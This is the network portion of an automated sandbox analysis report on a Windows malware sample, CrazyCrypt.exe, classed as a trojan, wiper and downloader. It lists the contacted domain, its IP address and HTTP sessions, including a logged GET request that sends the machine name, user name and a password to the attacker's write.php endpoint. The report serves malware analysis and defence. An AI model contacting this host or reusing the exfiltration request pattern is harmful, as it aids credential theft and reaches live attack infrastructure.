75620d6a...595a | Network
VTI SCORE: 93/100
Dynamic Analysis Report
Classification: Trojan, Wiper, Downloader

75620d6ae02a9a3beb5eb47020012eee52001bf434304f4e77b43011a6e5595a (SHA256)

CrazyCrypt.exe

Windows Exe (x86-32)

Created at 2019-02-28 11:07:00

Network Overview

Hosts (1)
Hostname | IP Address | Location | Protocols | Reputation Status | WHOIS Data
crazycrypt.store | 178.33.107.134 | France | HTTP, TCP | Not Queried | Not Queried
DNS Queries (1)
Hostname | Categories | Names | Source | Reputation Status
crazycrypt.store | - | - | Function Log | Not Queried
URLs (2)
URL | Categories | Names | Source | HTTP Status Code | Reputation Status
http://crazycrypt.store/requests/write.php?computer_name=XDUWTFONO&userName=5p5NrGJn0jS%20HALPmcxz&password=9C354B42 | - | - | Function Log | OK (200) | Unknown
http://crazycrypt.store/requests/website.php | - | - | Function Log | OK (200) | Unknown

Connections

DNS (1)
Operation | Additional Information | Success | Count
Resolve Name | host = crazycrypt.store, address_out = 178.33.107.134 | True | 1
TCP Sessions (1)
Information | Value
Total Data Sent | 0.21 KB
Total Data Received | 0.49 KB
Contacted Host Count | 1
Contacted Hosts | 178.33.107.134:80
TCP Session #1
Information | Value
Handle | 0x47c
Address Family | AF_INET
Type | SOCK_STREAM
Protocol | IPPROTO_TCP
Remote Address | 178.33.107.134
Remote Port | 80
Local Address | 0.0.0.0
Local Port | 49158
Data Sent | 0.21 KB
Data Received | 0.49 KB
Operation | Additional Information | Success | Count
Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM | True | 1
Connect | remote_address = 178.33.107.134, remote_port = 80 | True | 1
Send | flags = NO_FLAG_SET, size = 158, size_out = 158 | True | 1
Receive | flags = NO_FLAG_SET, size = 4096, size_out = 273 | True | 1
Send | flags = NO_FLAG_SET, size = 62, size_out = 62 | True | 1
Receive | flags = NO_FLAG_SET, size = 4096, size_out = 225 | True | 1
HTTP Sessions (2)
Information | Value
Total Data Sent | 0.21 KB
Total Data Received | 0.49 KB
Contacted Host Count | 1
Contacted Hosts | crazycrypt.store
HTTP Session #1
Information | Value
Source | Function Log
Server Name | crazycrypt.store
Server Port | 80
Data Sent | 0.15 KB
Data Received | 0.27 KB
Operation | Additional Information | Success | Count
Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS | True | 1
Open Connection | protocol = http, server_name = crazycrypt.store, server_port = 80 | True | 1
Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /requests/write.php?computer_name=XDUWTFONO&userName=5p5NrGJn0jS%20HALPmcxz&password=9C354B42 | True | 1
Send HTTP Request | headers = host: crazycrypt.store, connection: Keep-Alive, url = crazycrypt.store/requests/write.php?computer_name=XDUWTFONO&userName=5p5NrGJn0jS%20HALPmcxz&password=9C354B42 | True | 1
Read Response | size = 4096, size_out = 273 | True | 1
HTTP Session #2
Information | Value
Source | Function Log
Server Name | crazycrypt.store
Server Port | 80
Data Sent | 0.06 KB
Data Received | 0.22 KB
Operation | Additional Information | Success | Count
Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS | True | 1
Open Connection | protocol = http, server_name = crazycrypt.store, server_port = 80 | True | 1
Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /requests/website.php | True | 1
Send HTTP Request | headers = host: crazycrypt.store, url = crazycrypt.store/requests/website.php | True | 1
Read Response | size = 4096, size_out = 225 | True | 1